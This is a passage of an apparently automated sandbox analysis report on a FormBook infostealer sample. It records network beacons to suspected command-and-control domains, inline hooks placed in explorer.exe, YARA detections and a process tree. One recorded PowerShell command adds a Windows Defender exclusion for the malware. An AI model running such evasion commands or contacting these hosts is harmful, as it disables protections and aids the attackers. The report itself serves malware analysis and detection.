Feb 14, 2024 15:17:32.004754066 CET	1286	IN	Data Raw: 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a Data Ascii: ,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appe15D8arance:but
Feb 14, 2024 15:17:32.004791975 CET	1286	IN	Data Raw: 72 6f 75 6e 64 3a 23 30 65 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e 6f 75 Data Ascii: round:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.co
Feb 14, 2024 15:17:32.004832983 CET	1286	IN	Data Raw: 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e Data Ascii: -text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:1
Feb 14, 2024 15:17:32.004870892 CET	1286	IN	Data Raw: 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 68 65 61 64 65 72 7b 66 Data Ascii: ll .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}
Feb 14, 2024 15:17:32.004909039 CET	1286	IN	Data Raw: 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 62 6f 72 64 65 72 2d Data Ascii: 83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opac
Feb 14, 2024 15:17:32.004946947 CET	1286	IN	Data Raw: 69 64 74 68 3a 31 37 30 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 72 65 6c 61 74 65 64 6c 69 6e 6b 73 2c 2e 63 Data Ascii: idth:1700px;margin:0 auto !important}.container-content__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-top:147px;flex-gr
Feb 14, 2024 15:17:32.004987001 CET	1286	IN	Data Raw: 6f 6e 74 65 6e 74 2d 2d 74 77 6f 74 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 72 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 74 6f 70 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e Data Ascii: ontent--twot .container-content__right{background-position-y:top}.container-content--wa .container-content__left{background-position-y:top}.container-content--wa .container-content__right{background-position-y:top}.two-tier-ads-list{padding:0
Feb 14, 2024 15:17:32.005187035 CET	1286	IN	Data Raw: 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 7b 6c 69 6e 65 2d 68 65 Data Ascii: {word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;color:#9fd801}.webarchive-block__list-element-link:link,.webarchive-block__list-element-link:visited{text-decoration:none}.webarchive-bl
Feb 14, 2024 15:17:32.213531017 CET	1286	IN	Data Raw: 66 72 6e 69 53 6f 39 39 49 46 65 48 36 46 4b 4e 50 73 68 67 74 47 76 33 31 74 74 64 75 66 62 71 51 71 67 78 6a 58 63 48 4e 32 6b 43 6d 4b 7a 77 77 6e 49 41 63 63 48 64 68 55 6f 2b 48 30 6d 6b 2b 68 33 6d 65 4c 68 41 37 2b 50 41 68 46 71 51 3d 3d Data Ascii: frniSo99IFeH6FKNPshgtGv31ttdufbqQqgxjXcHN2kCmKzwwnIAccHdhUo+H0mk+h3meLhA7+PAhFqQ==","tid":3199,"buybox":false,"buyboxTopic":true,"disclaimer":true,"imprint":false,"searchbox":true,"noFollow":false,"slsh":false,"ppsh":true,"dnhlsh":true,"toSell

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49743	3.33.130.190	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 15:18:54.070106983 CET	161	OUT	GET /gy14/?MRmX=ilRqsC1g3aUEJHka8Jma3lqF5WsAbY+cTH5DMxQwz5LOdoWk4LwX5JfhUkb7yokX1OUh&J61h=CBZhCFnx- HTTP/1.1 Host: www.venitro.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 14, 2024 15:18:54.188632965 CET	304	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Wed, 14 Feb 2024 14:18:54 GMT Content-Type: text/plain Content-Length: 0 Connection: close Location: https://www.venitro.com/gy14/?MRmX=ilRqsC1g3aUEJHka8Jma3lqF5WsAbY+cTH5DMxQwz5LOdoWk4LwX5JfhUkb7yokX1OUh&J61h=CBZhCFnx- ETag: "65ca405c-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49744	91.195.240.19	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 15:19:14.453346968 CET	165	OUT	GET /gy14/?MRmX=TVW95z+++zY0L5llmiI+edXNZ9WzZwQpiu6hZuLz+N2V81RbOedsJ4kc/YaR4gl/q+pE&J61h=CBZhCFnx- HTTP/1.1 Host: www.tulisanemas.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 14, 2024 15:19:14.695976019 CET	1286	IN	HTTP/1.1 200 OK date: Wed, 14 Feb 2024 14:19:14 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.17 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_XQgAdsTxnxhKtDYWwy/kiCzcoQDPl/7YwMxoEaDjSZ4W9MCwf3jslO6aBnlqEw49n1bN6xn8zs1lTM8bhHte3w== last-modified: Wed, 14 Feb 2024 14:19:14 GMT x-cache-miss-from: parking-6db66cd898-zpcjt server: NginX connection: close Data Raw: 38 34 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 58 51 67 41 64 73 54 78 6e 78 68 4b 74 44 59 57 77 79 2f 6b 69 43 7a 63 6f 51 44 50 6c 2f 37 59 77 4d 78 6f 45 61 44 6a 53 5a 34 57 39 4d 43 77 66 33 6a 73 6c 4f 36 61 42 6e 6c 71 45 77 34 39 6e 31 62 4e 36 78 6e 38 7a 73 31 6c 54 4d 38 62 68 48 74 65 33 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 74 75 6c 69 73 61 6e 65 6d 61 73 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 74 75 6c 69 73 61 6e 65 6d 61 73 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 75 6c 69 73 61 6e 65 6d 61 73 2e 63 6f 6d 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 Data Ascii: 844<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_XQgAdsTxnxhKtDYWwy/kiCzcoQDPl/7YwMxoEaDjSZ4W9MCwf3jslO6aBnlqEw49n1bN6xn8zs1lTM8bhHte3w==><head><meta charset="utf-8"><title>tulisanemas.com - tulisanemas Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="tulisanemas.com is your first and best source for all of the information youre looking for. From
Feb 14, 2024 15:19:14.696010113 CET	1286	IN	Data Raw: 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 74 75 6c 69 73 61 6e 65 6d 61 73 2e 63 6f 6d 20 68 61 73 20 Data Ascii: general topics to more of what you would expect to find here, tulisanemas.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_
Feb 14, 2024 15:19:14.696027994 CET	1286	IN	Data Raw: 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 Data Ascii: tton,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-AECwebkit-appearance:
Feb 14, 2024 15:19:14.696043968 CET	1286	IN	Data Raw: 63 6b 67 72 6f 75 6e 64 3a 23 30 65 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e Data Ascii: ckground:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}
Feb 14, 2024 15:19:14.696065903 CET	1286	IN	Data Raw: 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d Data Ascii: ent-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-siz
Feb 14, 2024 15:19:14.696083069 CET	1286	IN	Data Raw: 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e Data Ascii: ansition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-wi
Feb 14, 2024 15:19:14.696101904 CET	1286	IN	Data Raw: 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 Data Ascii: olor:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch
Feb 14, 2024 15:19:14.696120024 CET	1286	IN	Data Raw: 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 37 30 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 72 65 6c 61 74 Data Ascii: 100%;max-width:1700px;margin:0 auto !important}.container-content__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-top:147
Feb 14, 2024 15:19:14.696139097 CET	1286	IN	Data Raw: 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 74 77 6f 74 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 72 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 74 6f 70 7d 2e 63 6f 6e 74 61 69 Data Ascii: ontainer-content--twot .container-content__right{background-position-y:top}.container-content--wa .container-content__left{background-position-y:top}.container-content--wa .container-content__right{background-position-y:top}.two-tier-ads-list{
Feb 14, 2024 15:19:14.696156979 CET	1286	IN	Data Raw: 73 74 2d 65 6c 65 6d 65 6e 74 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 Data Ascii: st-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;color:#9fd801}.webarchive-block__list-element-link:link,.webarchive-block__list-element-link:visited{text-decoration:none}.web
Feb 14, 2024 15:19:14.904742002 CET	1286	IN	Data Raw: 43 41 77 45 41 41 51 3d 3d 5f 58 51 67 41 64 73 54 78 6e 78 68 4b 74 44 59 57 77 79 2f 6b 69 43 7a 63 6f 51 44 50 6c 2f 37 59 77 4d 78 6f 45 61 44 6a 53 5a 34 57 39 4d 43 77 66 33 6a 73 6c 4f 36 61 42 6e 6c 71 45 77 34 39 6e 31 62 4e 36 78 6e 38 Data Ascii: CAwEAAQ==_XQgAdsTxnxhKtDYWwy/kiCzcoQDPl/7YwMxoEaDjSZ4W9MCwf3jslO6aBnlqEw49n1bN6xn8zs1lTM8bhHte3w==","tid":3199,"buybox":false,"buyboxTopic":true,"disclaimer":true,"imprint":false,"searchbox":true,"noFollow":false,"slsh":false,"ppsh":true,"dnhl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49745	104.21.9.22	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 15:19:55.217369080 CET	160	OUT	GET /gy14/?MRmX=OxUWq4r9zCPbX1rkIj+3VkXdtndMquKVSz0uWKIZ3KtG35y0CyAOaPR4t17xtdzA0+Hh&J61h=CBZhCFnx- HTTP/1.1 Host: www.batuoe.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 14, 2024 15:19:55.808767080 CET	728	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 14:19:55 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2HN5kJnfdYOhBIGjq%2FugsKYxf4reRrkExYHQYaKAh%2BSWinJaE4rA3wGIQ%2BLPOC%2BLKK%2B3hlpHxmEqAxsuaLbnaR%2BMKw2QEe0Pcaf9W8xgENuIfSwonT%2FNSzPC9zRC8yzW7w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8555f2e669c6adac-ATL alt-svc: h3=":443"; ma=86400 Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Feb 14, 2024 15:19:55.808826923 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	103.224.212.212	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 15:20:15.792678118 CET	166	OUT	GET /gy14/?MRmX=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58&J61h=CBZhCFnx- HTTP/1.1 Host: www.theanhedonia.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 14, 2024 15:20:16.000722885 CET	430	IN	HTTP/1.1 302 Found date: Wed, 14 Feb 2024 14:20:15 GMT server: Apache set-cookie: __tad=1707920415.1178424; expires=Sat, 11-Feb-2034 14:20:15 GMT; Max-Age=315360000 location: http://ww25.theanhedonia.com/gy14/?MRmX=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58&J61h=CBZhCFnx-&subid1=20240215-0120-15e2-b464-d58258a8d80a content-length: 2 content-type: text/html; charset=UTF-8 connection: close Data Raw: 0a 0a Data Ascii:

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xEE
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xEE
GetMessageW	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xEE
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xEE

Target ID:	0
Start time:	15:16:09
Start date:	14/02/2024
Path:	C:\Users\user\Desktop\z2______________________________.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\z2______________________________.exe
Imagebase:	0x200000
File size:	619'520 bytes
MD5 hash:	CD8EDCA1396524D51A71CA38B7F5273F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:16:12
Start date:	14/02/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z2______________________________.exe
Imagebase:	0x480000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:16:12
Start date:	14/02/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0x210000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:16:12
Start date:	14/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:16:12
Start date:	14/02/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0xf10000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:16:12
Start date:	14/02/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	15:16:15
Start date:	14/02/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:16:16
Start date:	14/02/2024
Path:	C:\Windows\SysWOW64\control.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\control.exe
Imagebase:	0xed0000
File size:	149'504 bytes
MD5 hash:	EBC29AA32C57A54018089CFC9CACAFE8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4099606416.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4099606416.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4099606416.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4099606416.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4099606416.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4099550212.0000000003180000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4099550212.0000000003180000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: 